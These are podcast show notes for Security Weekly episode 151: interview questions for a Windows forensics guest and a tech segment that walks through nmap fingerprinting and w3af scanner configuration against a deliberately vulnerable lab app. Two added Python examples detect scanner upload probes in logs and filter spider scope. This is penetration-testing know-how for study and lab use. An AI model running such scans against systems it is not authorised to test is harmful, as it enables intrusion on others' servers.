Episode151

From Paul's Security Weekly

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Sponsors

  • Tenable Network Security - This episode is sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creator of Nessus, the world's best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool.
  • Trustwave SpiderLabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Announcements & Shameless Plugs

Security Weekly - Episode 151 - May 7, 2009

  • SANS@Home/Community - SEC517 Cutting-Edge Hacking Techniques - May 11 & 13th 7-10PM use the discount code "Security Weekly" for a 10% savings - Click here to register now! - NOTE: Due to logistical issues, this event will only be done remotely.
  • 2009 South Florida ISSA Conference and Exhibition - June 24th Learn more!
  • SANS Security Europe: 504 in Amsterdam with Larry. May 18th-23rd
  • SANS Pentest Summit! Vegas Baby! Paul, Larry, John presenting. June 1st - 2nd

Episode Media

mp3

Special Guest: Harlan Carvey

Harlan Carvey (CISSP), author of the acclaimed Windows Forensics and Incident Recovery, is a computer forensics and incident response consultant based out of the Northern VA/Metro DC area.

He currently provides emergency incident response and computer forensic analysis services to clients throughout the U.S. His specialties include focusing specifically on the Windows 2000 and later platforms with regard to incident response, Registry and memory analysis, and post-mortem computer forensic analysis.

Harlan's background includes positions as a consultant performing vulnerability assessments and penetration tests and as a full-time security engineer. He also has supported federal government agencies with incident response and computer forensic services.

Harlan holds a bachelor's degree in electrical engineering from the Virginia Military Institute and a master's degree in electrical engineering from the Naval Postgraduate School.

Questions:

  1. How did you get started in infosec?
  2. Windows forensics is a huge field, how does someone get started?
  3. What are your thoughts on Helix going commercial?
  4. What are some of your favorite tools? Commercial and Free?
  5. Some of your favorite cases (we want the juicy ones, of course)?
  6. What are some of the more clever hacks you have seen for recovering information (and constructing a timeline)? Registry? IE History? Restore points?
  7. I'm seeing a trend in delving deeper and deeper into a system to gather information. Is this because folks are getting smarter and better at hiding their tracks, or because Windows is getting better?
  8. How much of the more advanced analysis is making it to court cases, or is often the basic analysis enough?
  9. How does one get into authoring? Is this something you would recommend for others?
  10. What are some of the more common mistakes you see folks making?
  11. If you could wave a magic wand, what would you change about the Windows OS to make forensics easier/more effective?
  12. What're the security things that keep you up at night?
  13. Who is Captain Forensics?

Tech Segment: w3af FTW with Seth Misenar

In episode 144, I gave a technical segment that provided a broad overview of the functionality provided by w3af. In this episode, I hope to illustrate some techniques you can use to break into some web apps.

The Setup

  • OWASP Live CD within a VM as the attack platform (another alternative would be SamuraiWTF).
  • Mutillidae (thanks, Irongeek) on a Windows platform as the target: (http://192.168.117.1/mutillidea/)
  • Added "functionality" to Mutillidae, including an additional vulnerable PHP application (http://192.168.117.1/mutillidae/audits) - (thanks to Andres for the code and the suggestion)

The Process

The goal was to show how we can use w3af to discover web application vulnerabilities and exploit them. Web application assessments are more art than science, even with the burgeoning tools that are available. It is never a good idea to enable all of the scanning/attacking options and set the tool loose; this is especially true of w3af's Discovery plugins, many of which query third-party services or hammer the target. Let's start by collecting information about the architecture of our target (192.168.117.1):

# nmap -O -sC -sV -p80 192.168.117.1

The results show the operating system to be Windows running an Apache web server leveraging a PHP framework. This information will be added to the context of our scan. As stated in the previous podcast (144), there are two primary methods of configuring/running scans: the GUI and the console. We explore each in the videos associated with this tech segment and will discuss them here.

Console

The help command provides a context-sensitive help menu for the current section of the console:

w3af>>> help
|-----------------------------------------------------------------------------|
| start         | Start the scan.                                             |
| plugins       | Enable and configure plugins.                               |
| exploit       | Exploit the vulnerability.                                  |
| profiles      | List and use scan profiles.                                 |
|-----------------------------------------------------------------------------|
| http-settings | Configure the HTTP settings of the framework.               |
| misc-settings | Configure w3af misc settings.                               |
| target        | Configure the target URL.                                   |
|-----------------------------------------------------------------------------|
| back          | Go to the previous menu.                                    |
| exit          | Exit w3af.                                                  |
| assert        | Check assertion.                                            |
|-----------------------------------------------------------------------------|
| help          | Display help. Issuing: help [command] , prints more         |
|               | specific help about "command"                               |
| version       | Show w3af version information.                              |
| keys          | Display key shortcuts.                                      |
|-----------------------------------------------------------------------------|
w3af>>>

The target command takes us into the target configuration section of the w3af console, where view shows the current settings:

w3af>>> target
w3af/config:target>>> view
|------------------------------------------------------------------------------|
| Setting         | Value   | Description                                      |
|------------------------------------------------------------------------------|
| targetOS        | unknown | Target operating system (unknown/unix/windows)   |
| targetFramework | unknown | Target programming framework                     |
|                 |         | (unknown/php/asp/asp.net/java/jsp/cfm/ruby/perl) |
| target          |         | A comma separated list of URLs                   |
|------------------------------------------------------------------------------|
w3af/config:target>>>

Let's set our configuration options for our target:

w3af/config:target>>> set targetOS windows
w3af/config:target>>> set targetFramework php
w3af/config:target>>> set target http://localhost/mutillidae/audit/file_upload/

Now we can see that our target settings took.

w3af/config:target>>> view
|---------------------------------------------------------------------------------------------------|
| Setting         | Value                                          | Description                    |
|---------------------------------------------------------------------------------------------------|
| targetOS        | windows                                        | Target operating system        |
|                 |                                                | (unknown/unix/windows)         |
| targetFramework | php                                            | Target programming framework   |
|                 |                                                | (unknown/php/asp/asp.net/java/ |
|                 |                                                | jsp/cfm/ruby/perl)             |
| target          | http://localhost/mutillidae/audit/file_upload/ | A comma separated list of URLs |
|---------------------------------------------------------------------------------------------------|
w3af/config:target>>>

Now we jump back to the main console, and then move into the plugins section. The plugins command will take us into the section of the w3af console that allows us to configure our plugins.

w3af/config:target>>> back
w3af>>> plugins

Let's view the various plugin categories available:

w3af/plugins>>> help
|-----------------------------------------------------------------------------|
| list          | List available plugins.                                     |
|-----------------------------------------------------------------------------|
| back          | Go to the previous menu.                                    |
| exit          | Exit w3af.                                                  |
| assert        | Check assertion.                                            |
|-----------------------------------------------------------------------------|
| audit         | View, configure and enable audit plugins                    |
| bruteforce    | View, configure and enable bruteforce plugins               |
| discovery     | View, configure and enable discovery plugins                |
| evasion       | View, configure and enable evasion plugins                  |
| grep          | View, configure and enable grep plugins                     |
| mangle        | View, configure and enable mangle plugins                   |
| output        | View, configure and enable output plugins                   |
|-----------------------------------------------------------------------------|
w3af/plugins>>>

The audit command will show us the current audit plugin configuration.

w3af/plugins>>> audit
|----------------------------------------------------------------------------|
| Plugin name       | Status | Conf | Description                            |
|----------------------------------------------------------------------------|
| LDAPi             |        |      | Find LDAP injection bugs.              |
| blindSqli         |        | Yes  | Find blind SQL injection               |
|                   |        |      | vulnerabilities.                       |
| buffOverflow      |        |      | Find buffer overflow vulnerabilities.  |
| dav               |        |      | Verify if the WebDAV module is         |
|                   |        |      | properly configured.                   |
| eval              |        | Yes  | Find insecure eval() usage.            |
| fileUpload        |        | Yes  | Uploads a file and then searches for   |
|                   |        |      | the file inside all known directories. |
| formatString      |        |      | Find format string vulnerabilities.    |
| frontpage         |        | Yes  | Tries to upload a file using frontpage |
|                   |        |      | extensions (author.dll).               |
| generic           |        | Yes  | Find all kind of bugs without using a  |
|                   |        |      | fixed database of errors.              |
| globalRedirect    |        |      | Find scripts that redirect the browser |
|                   |        |      | to any site.                           |
| htaccessMethods   |        |      | Find misconfigurations in the          |
|                   |        |      | "<LIMIT>" configuration of Apache.     |
| localFileInclude  |        |      | Find local file inclusion              |
|                   |        |      | vulnerabilities.                       |
| mxInjection       |        |      | Find MX injection vulnerabilities.     |
| osCommanding      |        |      | Find OS Commanding vulnerabilities.    |
| phishingVector    |        |      | Find phishing vectors.                 |
| preg_replace      |        |      | Find unsafe usage of PHPs              |
|                   |        |      | preg_replace.                          |
| remoteFileInclude |        | Yes  | Find remote file inclusion             |
|                   |        |      | vulnerabilities.                       |
| responseSplitting |        |      | Find response splitting                |
|                   |        |      | vulnerabilities.                       |
| sqli              |        |      | Find SQL injection bugs.               |
| ssi               |        |      | Find server side inclusion             |
|                   |        |      | vulnerabilities.                       |
| sslCertificate    |        |      | Check the SSL certificate validity( if |
|                   |        |      | https is being used ).                 |
| unSSL             |        |      | Find out if secure content can also be |
|                   |        |      | fetched using http.                    |
| xpath             |        |      | Find XPATH injection vulnerabilities.  |
| xsrf              |        |      | Find the easiest to exploit xsrf       |
|                   |        |      | vulnerabilities.                       |
| xss               |        | Yes  | Find cross site scripting              |
|                   |        |      | vulnerabilities.                       |
| xst               |        |      | Find Cross Site Tracing                |
|                   |        |      | vulnerabilities.                       |
|----------------------------------------------------------------------------|
w3af/plugins>>>

Now, we enable the fileUpload audit plugin with the following command, and then confirm the configuration.

w3af/plugins>>> audit fileUpload
w3af/plugins>>> audit
|----------------------------------------------------------------------------|
| Plugin name       | Status  | Conf | Description                           |
|----------------------------------------------------------------------------|
| LDAPi             |         |      | Find LDAP injection bugs.             |
| blindSqli         |         | Yes  | Find blind SQL injection              |
|                   |         |      | vulnerabilities.                      |
| buffOverflow      |         |      | Find buffer overflow vulnerabilities. |
| dav               |         |      | Verify if the WebDAV module is        |
|                   |         |      | properly configured.                  |
| eval              |         | Yes  | Find insecure eval() usage.           |
| fileUpload        | Enabled | Yes  | Uploads a file and then searches for  |
|                   |         |      | the file inside all known             |
|                   |         |      | directories.                          |
| formatString      |         |      | Find format string vulnerabilities.   |
| frontpage         |         | Yes  | Tries to upload a file using          |
|                   |         |      | frontpage extensions (author.dll).    |
| generic           |         | Yes  | Find all kind of bugs without using a |
|                   |         |      | fixed database of errors.             |
| globalRedirect    |         |      | Find scripts that redirect the        |
|                   |         |      | browser to any site.                  |
| htaccessMethods   |         |      | Find misconfigurations in the         |
|                   |         |      | "<LIMIT>" configuration of Apache.    |
| localFileInclude  |         |      | Find local file inclusion             |
|                   |         |      | vulnerabilities.                      |
| mxInjection       |         |      | Find MX injection vulnerabilities.    |
| osCommanding      |         |      | Find OS Commanding vulnerabilities.   |
| phishingVector    |         |      | Find phishing vectors.                |
| preg_replace      |         |      | Find unsafe usage of PHPs             |
|                   |         |      | preg_replace.                         |
| remoteFileInclude |         | Yes  | Find remote file inclusion            |
|                   |         |      | vulnerabilities.                      |
| responseSplitting |         |      | Find response splitting               |
|                   |         |      | vulnerabilities.                      |
| sqli              |         |      | Find SQL injection bugs.              |
| ssi               |         |      | Find server side inclusion            |
|                   |         |      | vulnerabilities.                      |
| sslCertificate    |         |      | Check the SSL certificate validity(   |
|                   |         |      | if https is being used ).             |
| unSSL             |         |      | Find out if secure content can also   |
|                   |         |      | be fetched using http.                |
| xpath             |         |      | Find XPATH injection vulnerabilities. |
| xsrf              |         |      | Find the easiest to exploit xsrf      |
|                   |         |      | vulnerabilities.                      |
| xss               |         | Yes  | Find cross site scripting             |
|                   |         |      | vulnerabilities.                      |
| xst               |         |      | Find Cross Site Tracing               |
|                   |         |      | vulnerabilities.                      |
|----------------------------------------------------------------------------|
w3af/plugins>>>
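From the defender's side, the behaviour the table documents for fileUpload (upload a file, then request that file name in every known directory) leaves a distinctive trace in the web server's access log: one POST from a client, followed by GETs for the same file name across many directories, nearly all of them answered 404 because the file exists in only one place. The following Python script is added here as an example and is not code from w3af or Mutillidae. It parses Apache combined-format log lines and flags that pattern. The log lines, client addresses, user agents, the probe file name and the min_dirs threshold are all constructed for the example.

```python
import re
from collections import defaultdict
from posixpath import basename, dirname

# Apache combined log format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]   # drop the query string
    rec["status"] = int(rec["status"])
    return rec


def find_upload_probes(lines, min_dirs=4):
    """Return {(client_ip, file_name): {"dirs": [...], "misses": n}} for each
    client that sent a POST (the upload) and afterwards requested the same
    file name in at least `min_dirs` distinct directories, with at least half
    of those requests answered 404.  min_dirs is an assumed threshold; tune it
    for the site being monitored."""
    posted = set()                 # clients that have uploaded something
    probes = defaultdict(dict)     # (ip, file name) -> {directory: status}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST":
            posted.add(rec["ip"])
        elif rec["method"] == "GET" and rec["ip"] in posted:
            name = basename(rec["path"])
            if name:
                probes[(rec["ip"], name)][dirname(rec["path"])] = rec["status"]
    hits = {}
    for key, by_dir in probes.items():
        misses = sum(1 for s in by_dir.values() if s == 404)
        if len(by_dir) >= min_dirs and misses * 2 >= len(by_dir):
            hits[key] = {"dirs": sorted(by_dir), "misses": misses}
    return hits


# Constructed sample log: one ordinary browser session and one scanner-like client.
SAMPLE_LOG = """\
10.0.0.7 - - [07/May/2009:20:00:01 -0400] "GET /mutillidae/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (constructed)"
10.0.0.7 - - [07/May/2009:20:00:05 -0400] "POST /mutillidae/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (constructed)"
10.0.0.7 - - [07/May/2009:20:00:06 -0400] "GET /mutillidae/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (constructed)"
192.168.117.50 - - [07/May/2009:20:01:10 -0400] "POST /mutillidae/audit/file_upload/index.php HTTP/1.1" 200 1523 "-" "scanner (constructed)"
192.168.117.50 - - [07/May/2009:20:01:11 -0400] "GET /mutillidae/audit/file_upload/probe_a1b2.html HTTP/1.1" 200 42 "-" "scanner (constructed)"
192.168.117.50 - - [07/May/2009:20:01:11 -0400] "GET /mutillidae/probe_a1b2.html HTTP/1.1" 404 210 "-" "scanner (constructed)"
192.168.117.50 - - [07/May/2009:20:01:12 -0400] "GET /mutillidae/audit/probe_a1b2.html HTTP/1.1" 404 210 "-" "scanner (constructed)"
192.168.117.50 - - [07/May/2009:20:01:12 -0400] "GET /mutillidae/images/probe_a1b2.html HTTP/1.1" 404 210 "-" "scanner (constructed)"
192.168.117.50 - - [07/May/2009:20:01:13 -0400] "GET /mutillidae/audit/file_upload/uploads/probe_a1b2.html HTTP/1.1" 404 210 "-" "scanner (constructed)"
"""


if __name__ == "__main__":
    for (ip, name), info in find_upload_probes(SAMPLE_LOG.splitlines()).items():
        print(f"{ip} probed {name} in {len(info['dirs'])} directories "
              f"({info['misses']} x 404): {info['dirs']}")
```

The 404 ratio is what separates this from a browser that legitimately fetches index.php in a few directories after logging in: those requests succeed, while a search for an uploaded file misses everywhere except the directory it landed in.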

The discovery command shows the current discovery plugin configuration.

w3af/plugins>>> discovery
|---------------------------------------------------------------------------|
| Plugin name            | Status | Conf | Description                      |
|---------------------------------------------------------------------------|
| MSNSpider              |        | Yes  | Search MSN to get a list of new  |
|                        |        |      | URLs                             |
| afd                    |        |      | Find out if the remote web       |
|                        |        |      | server has an active filter (    |
|                        |        |      | IPS or WAF ).                    |
| allowedMethods         |        | Yes  | Enumerate the allowed methods of |
|                        |        |      | an URL.                          |
| archiveDotOrg          |        | Yes  | Search archive.org to find new   |
|                        |        |      | pages in the target site.        |
| crossDomain            |        |      | Analyze the crossdomain.xml      |
|                        |        |      | file.                            |
| detectReverseProxy     |        |      | Find out if the remote web       |
|                        |        |      | server has a reverse proxy.      |
| detectTransparentProxy |        |      | Find out if your ISP has a       |
|                        |        |      | transparent proxy installed.     |
| digitSum               |        | Yes  | Take an URL with a number (      |
|                        |        |      | index2.asp ) and try to find     |
|                        |        |      | related files (index1.asp,       |
|                        |        |      | index3.asp).                     |
| dnsWildcard            |        |      | Find out if www.site.com and     |
|                        |        |      | site.com return the same page.   |
| domain_dot             |        |      | Send a specially crafted request |
|                        |        |      | with a dot after the domain      |
|                        |        |      | (http://host.tld./) and analyze  |
|                        |        |      | response.                        |
| dotNetErrors           |        |      | Request specially crafted URLs   |
|                        |        |      | that generate ASP.NET errors in  |
|                        |        |      | order to gather information.     |
| findBackdoor           |        |      | Find web backdoors and web       |
|                        |        |      | shells.                          |
| findCaptchas           |        |      | Identify captcha images on web   |
|                        |        |      | pages.                           |
| findvhost              |        |      | Modify the HTTP Host header and  |
|                        |        |      | try to find virtual hosts.       |
| fingerGoogle           |        | Yes  | Search Google using the Google   |
|                        |        |      | API to get a list of users for a |
|                        |        |      | domain.                          |
| fingerMSN              |        | Yes  | Search MSN to get a list of      |
|                        |        |      | users for a domain.              |
| fingerPKS              |        |      | Search MIT PKS to get a list of  |
|                        |        |      | users for a domain.              |
| fingerprint_WAF        |        |      | Identify if a Web Application    |
|                        |        |      | Firewall is present and if       |
|                        |        |      | possible identify the vendor and |
|                        |        |      | version.                         |
| fingerprint_os         |        |      | Fingerprint the remote operating |
|                        |        |      | system using the HTTP protocol.  |
| frontpage_version      |        |      | Search FrontPage Server Info     |
|                        |        |      | file and if it finds it will     |
|                        |        |      | determine its version.           |
| ghdb                   |        | Yes  | Search Google for                |
|                        |        |      | vulnerabilities in the target    |
|                        |        |      | site.                            |
| googleSets             |        | Yes  | Use Google sets to get related   |
|                        |        |      | words from an URI and test them  |
|                        |        |      | to find new URLs.                |
| googleSpider           |        | Yes  | Search google using google API   |
|                        |        |      | to get new URLs                  |
| halberd                |        |      | Identify if the remote server    |
|                        |        |      | has HTTP load balancers.         |
| hmap                   |        | Yes  | Fingerprint the server type, i.e |
|                        |        |      | apache, iis, tomcat, etc.        |
| importResults          |        | Yes  | Import URLs found by other       |
|                        |        |      | tools.                           |
| oracleDiscovery        |        |      | Find Oracle applications on the  |
|                        |        |      | remote web server.               |
| phishtank              |        | Yes  | Search the phishtank.com         |
|                        |        |      | database to determine if your    |
|                        |        |      | server is (or was) being used in |
|                        |        |      | phishing scams.                  |
| phpEggs                |        |      | Fingerprint the PHP version      |
|                        |        |      | using documented easter eggs     |
|                        |        |      | that exist in PHP.               |
| phpinfo                |        |      | Search PHP Info file and if it   |
|                        |        |      | finds it will determine the      |
|                        |        |      | version of PHP.                  |
| pykto                  |        | Yes  | A nikto port to python.          |
| robotsReader           |        |      | Analyze the robots.txt file and  |
|                        |        |      | find new URLs                    |
| serverHeader           |        | Yes  | Identify the server type based   |
|                        |        |      | on the server header.            |
| serverStatus           |        |      | Find new URLs from the Apache    |
|                        |        |      | server-status cgi.               |
| sharedHosting          |        | Yes  | Use MSN search to determine if   |
|                        |        |      | the website is in a shared       |
|                        |        |      | hosting.                         |
| sitemapReader          |        |      | Analyze the sitemap.xml file and |
|                        |        |      | find new URLs                    |
| slash                  |        |      | Identify if the resource         |
|                        |        |      | http://host.tld/spam/ and        |
|                        |        |      | http://host.tld/spam are the     |
|                        |        |      | same.                            |
| spiderMan              |        | Yes  | SpiderMan is a local proxy that  |
|                        |        |      | will collect new URLs.           |
| urlFuzzer              |        | Yes  | Try to find backups, and other   |
|                        |        |      | related files.                   |
| userDir                |        | Yes  | Try to find user directories     |
|                        |        |      | like "http://test/~user/" and    |
|                        |        |      | identify the remote OS based on  |
|                        |        |      | the remote users.                |
| webDiff                |        | Yes  | Compare a local directory with a |
|                        |        |      | remote URL path.                 |
| webSpider              |        | Yes  | Crawl the whole site to find new |
|                        |        |      | URLs                             |
| wordnet                |        | Yes  | Use the wordnet lexical database |
|                        |        |      | to find new URLs.                |
| wsdlFinder             |        |      | Find web service definitions     |
|                        |        |      | files.                           |
| yahooSiteExplorer      |        | Yes  | Search Yahoo's index using Yahoo |
|                        |        |      | site explorer to get a list of   |
|                        |        |      | URLs                             |
| zone_h                 |        |      | Find out if the site was defaced |
|                        |        |      | in the past.                     |
|---------------------------------------------------------------------------|
w3af/plugins>>> 

This command enables the webSpider discovery plugin:

w3af/plugins>>> discovery webSpider

As the Conf column showed when we listed the discovery plugins, webSpider has configurable options. The config subcommand takes us into the configuration section for that plugin:

w3af/plugins>>> discovery config webSpider
w3af/plugins/discovery/config:webSpider>>>

Here we can see what options are available for configuration.

w3af/plugins/discovery/config:webSpider>>> view
|-----------------------------------------------------------------------------|
| Setting      | Value | Description                                          |
|-----------------------------------------------------------------------------|
| urlParameter |       | Append the given parameter to new URLs found by the  |
|              |       | spider. Example:                                     |
|              |       | http://www.foobar.com/index.jsp;<parameter>?id=2     |
| followRegex  | .*    | When spidering, only follow links that match this    |
|              |       | regular expression (ignoreRegex has precedence over  |
|              |       | followRegex)                                         |
| ignoreRegex  | None  | When spidering, DO NOT follow links that match this  |
|              |       | regular expression (has precedence over followRegex) |
| onlyForward  | False | When spidering, only search directories inside the   |
|              |       | one that was given as target                         |
|-----------------------------------------------------------------------------|
w3af/plugins/discovery/config:webSpider>>>

Now we set the onlyForward option to True, which keeps the spider from crawling above the target directory. After setting the option we confirm the setting.

w3af/plugins/discovery/config:webSpider>>> set onlyForward True
w3af/plugins/discovery/config:webSpider>>> view
|-----------------------------------------------------------------------------|
| Setting      | Value | Description                                          |
|-----------------------------------------------------------------------------|
| urlParameter |       | Append the given parameter to new URLs found by the  |
|              |       | spider. Example:                                     |
|              |       | http://www.foobar.com/index.jsp;<parameter>?id=2     |
| followRegex  | .*    | When spidering, only follow links that match this    |
|              |       | regular expression (ignoreRegex has precedence over  |
|              |       | followRegex)                                         |
| ignoreRegex  | None  | When spidering, DO NOT follow links that match this  |
|              |       | regular expression (has precedence over followRegex) |
| onlyForward  | True  | When spidering, only search directories inside the   |
|              |       | one that was given as target                         |
|-----------------------------------------------------------------------------|
w3af/plugins/discovery/config:webSpider>>>
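To make the interaction of the three link-filtering options concrete, here is a small Python reimplementation of the semantics the view output documents: ignoreRegex wins over followRegex, and onlyForward keeps the spider inside the directory given as the target. This is an added example, not w3af's own webSpider code. Restricting links to the target's scheme and host, matching the regular expressions with re.search against the absolute URL, and the sample links are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urljoin, urlsplit


@dataclass
class SpiderScope:
    """Link filter modelled on the webSpider options shown by `view`.
    (Added example: a reimplementation of the documented semantics, not w3af code.)"""
    target: str                         # the URL given with `set target`
    follow_regex: str = ".*"            # followRegex default
    ignore_regex: Optional[str] = None  # ignoreRegex default is shown as None
    only_forward: bool = False          # onlyForward default

    def target_dir(self) -> str:
        """Directory part of the target path; a target ending in '/' is the directory itself."""
        path = urlsplit(self.target).path or "/"
        return path if path.endswith("/") else path.rsplit("/", 1)[0] + "/"

    def should_follow(self, link: str) -> bool:
        """Decide whether a link found on a page is in scope for spidering."""
        url = urljoin(self.target, link)        # resolve relative links, collapse '..'
        t, u = urlsplit(self.target), urlsplit(url)
        # Assumption: the spider never leaves the target's scheme and host.
        if (u.scheme, u.netloc) != (t.scheme, t.netloc):
            return False
        # ignoreRegex has precedence over followRegex.
        if self.ignore_regex is not None and re.search(self.ignore_regex, url):
            return False
        if not re.search(self.follow_regex, url):
            return False
        # onlyForward: only directories inside the one given as target.
        if self.only_forward and not u.path.startswith(self.target_dir()):
            return False
        return True

    def filter_links(self, links):
        """Return the in-scope subset of `links`, resolved to absolute URLs."""
        return [urljoin(self.target, link) for link in links if self.should_follow(link)]


if __name__ == "__main__":
    # Constructed links as a spider might find them on the target page.
    found = ["upload.php", "../index.php", "uploads/",
             "http://localhost/mutillidae/", "http://evil.example/x.php"]
    scope = SpiderScope("http://localhost/mutillidae/audit/file_upload/", only_forward=True)
    for link in found:
        print(f"{'follow' if scope.should_follow(link) else 'skip  '} {link}")
```

With onlyForward set, a link such as ../index.php resolves to /mutillidae/audit/index.php, which is outside the target directory and is skipped; with onlyForward left at its default of False the same link is followed as long as the regular expressions allow it.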

Now we back out of the webSpider config view and confirm our discovery settings.

w3af/plugins/discovery/config:webSpider>>> back
w3af/plugins>>> discovery
|----------------------------------------------------------------------------|
| Plugin name            | Status  | Conf | Description                      |
|----------------------------------------------------------------------------|
| MSNSpider              |         | Yes  | Search MSN to get a list of new  |
|                        |         |      | URLs                             |
| afd                    |         |      | Find out if the remote web       |
|                        |         |      | server has an active filter (    |
|                        |         |      | IPS or WAF ).                    |
| allowedMethods         |         | Yes  | Enumerate the allowed methods of |
|                        |         |      | an URL.                          |
| archiveDotOrg          |         | Yes  | Search archive.org to find new   |
|                        |         |      | pages in the target site.        |
| crossDomain            |         |      | Analyze the crossdomain.xml      |
|                        |         |      | file.                            |
| detectReverseProxy     |         |      | Find out if the remote web       |
|                        |         |      | server has a reverse proxy.      |
| detectTransparentProxy |         |      | Find out if your ISP has a       |
|                        |         |      | transparent proxy installed.     |
| digitSum               |         | Yes  | Take an URL with a number (      |
|                        |         |      | index2.asp ) and try to find     |
|                        |         |      | related files (index1.asp,       |
|                        |         |      | index3.asp).                     |
| dnsWildcard            |         |      | Find out if www.site.com and     |
|                        |         |      | site.com return the same page.   |
| domain_dot             |         |      | Send a specially crafted request |
|                        |         |      | with a dot after the domain      |
|                        |         |      | (http://host.tld./) and analyze  |
|                        |         |      | response.                        |
| dotNetErrors           |         |      | Request specially crafted URLs   |
|                        |         |      | that generate ASP.NET errors in  |
|                        |         |      | order to gather information.     |
| findBackdoor           |         |      | Find web backdoors and web       |
|                        |         |      | shells.                          |
| findCaptchas           |         |      | Identify captcha images on web   |
|                        |         |      | pages.                           |
| findvhost              |         |      | Modify the HTTP Host header and  |
|                        |         |      | try to find virtual hosts.       |
| fingerGoogle           |         | Yes  | Search Google using the Google   |
|                        |         |      | API to get a list of users for a |
|                        |         |      | domain.                          |
| fingerMSN              |         | Yes  | Search MSN to get a list of      |
|                        |         |      | users for a domain.              |
| fingerPKS              |         |      | Search MIT PKS to get a list of  |
|                        |         |      | users for a domain.              |
| fingerprint_WAF        |         |      | Identify if a Web Application    |
|                        |         |      | Firewall is present and if       |
|                        |         |      | possible identify the vendor and |
|                        |         |      | version.                         |
| fingerprint_os         |         |      | Fingerprint the remote operating |
|                        |         |      | system using the HTTP protocol.  |
| frontpage_version      |         |      | Search FrontPage Server Info     |
|                        |         |      | file and if it finds it will     |
|                        |         |      | determine its version.           |
| ghdb                   |         | Yes  | Search Google for                |
|                        |         |      | vulnerabilities in the target    |
|                        |         |      | site.                            |
| googleSets             |         | Yes  | Use Google sets to get related   |
|                        |         |      | words from an URI and test them  |
|                        |         |      | to find new URLs.                |
| googleSpider           |         | Yes  | Search google using google API   |
|                        |         |      | to get new URLs                  |
| halberd                |         |      | Identify if the remote server    |
|                        |         |      | has HTTP load balancers.         |
| hmap                   |         | Yes  | Fingerprint the server type, i.e |
|                        |         |      | apache, iis, tomcat, etc.        |
| importResults          |         | Yes  | Import URLs found by other       |
|                        |         |      | tools.                           |
| oracleDiscovery        |         |      | Find Oracle applications on the  |
|                        |         |      | remote web server.               |
| phishtank              |         | Yes  | Search the phishtank.com         |
|                        |         |      | database to determine if your    |
|                        |         |      | server is (or was) being used in |
|                        |         |      | phishing scams.                  |
| phpEggs                |         |      | Fingerprint the PHP version      |
|                        |         |      | using documented easter eggs     |
|                        |         |      | that exist in PHP.               |
| phpinfo                |         |      | Search PHP Info file and if it   |
|                        |         |      | finds it will determine the      |
|                        |         |      | version of PHP.                  |
| pykto                  |         | Yes  | A nikto port to python.          |
| robotsReader           |         |      | Analyze the robots.txt file and  |
|                        |         |      | find new URLs                    |
| serverHeader           |         | Yes  | Identify the server type based   |
|                        |         |      | on the server header.            |
| serverStatus           |         |      | Find new URLs from the Apache    |
|                        |         |      | server-status cgi.               |
| sharedHosting          |         | Yes  | Use MSN search to determine if   |
|                        |         |      | the website is in a shared       |
|                        |         |      | hosting.                         |
| sitemapReader          |         |      | Analyze the sitemap.xml file and |
|                        |         |      | find new URLs                    |
| slash                  |         |      | Identify if the resource         |
|                        |         |      | http://host.tld/spam/ and        |
|                        |         |      | http://host.tld/spam are the     |
|                        |         |      | same.                            |
| spiderMan              |         | Yes  | SpiderMan is a local proxy that  |
|                        |         |      | will collect new URLs.           |
| urlFuzzer              |         | Yes  | Try to find backups, and other   |
|                        |         |      | related files.                   |
| userDir                |         | Yes  | Try to find user directories     |
|                        |         |      | like "http://test/~user/" and    |
|                        |         |      | identify the remote OS based on  |
|                        |         |      | the remote users.                |
| webDiff                |         | Yes  | Compare a local directory with a |
|                        |         |      | remote URL path.                 |
| webSpider              | Enabled | Yes  | Crawl the whole site to find new |
|                        |         |      | URLs                             |
| wordnet                |         | Yes  | Use the wordnet lexical database |
|                        |         |      | to find new URLs.                |
| wsdlFinder             |         |      | Find web service definitions     |
|                        |         |      | files.                           |
| yahooSiteExplorer      |         | Yes  | Search Yahoo's index using Yahoo |
|                        |         |      | site explorer to get a list of   |
|                        |         |      | URLs                             |
| zone_h                 |         |      | Find out if the site was defaced |
|                        |         |      | in the past.                     |
|----------------------------------------------------------------------------|
w3af/plugins>>>

Next we want to set how w3af is going to output the results. We jump into the output plugin menu, list the available plugins, and then enable and configure the ones we want.

w3af/plugins>>> output
|----------------------------------------------------------------------------|
| Plugin    | Status  | Conf | Description                                   |
| name      |         |      |                                               |
|----------------------------------------------------------------------------|
| console   |         | Yes  | Print messages to the console.                |
| gtkOutput |         |      | Saves messages to kb.kb.getData('gtkOutput',  |
|           |         |      | 'queue'), messages are saved in the form of   |
|           |         |      | objects.                                      |
| htmlFile  |         | Yes  | Print all messages to a HTML file.            |
| textFile  |         | Yes  | Prints all messages to a text file.           |
| xmlFile   |         | Yes  | Print all messages to a xml file.             |
|----------------------------------------------------------------------------|
w3af/plugins>>> output console, htmlFile
w3af/plugins>>> output config htmlFile
w3af/plugins/output/config:htmlFile>>> view
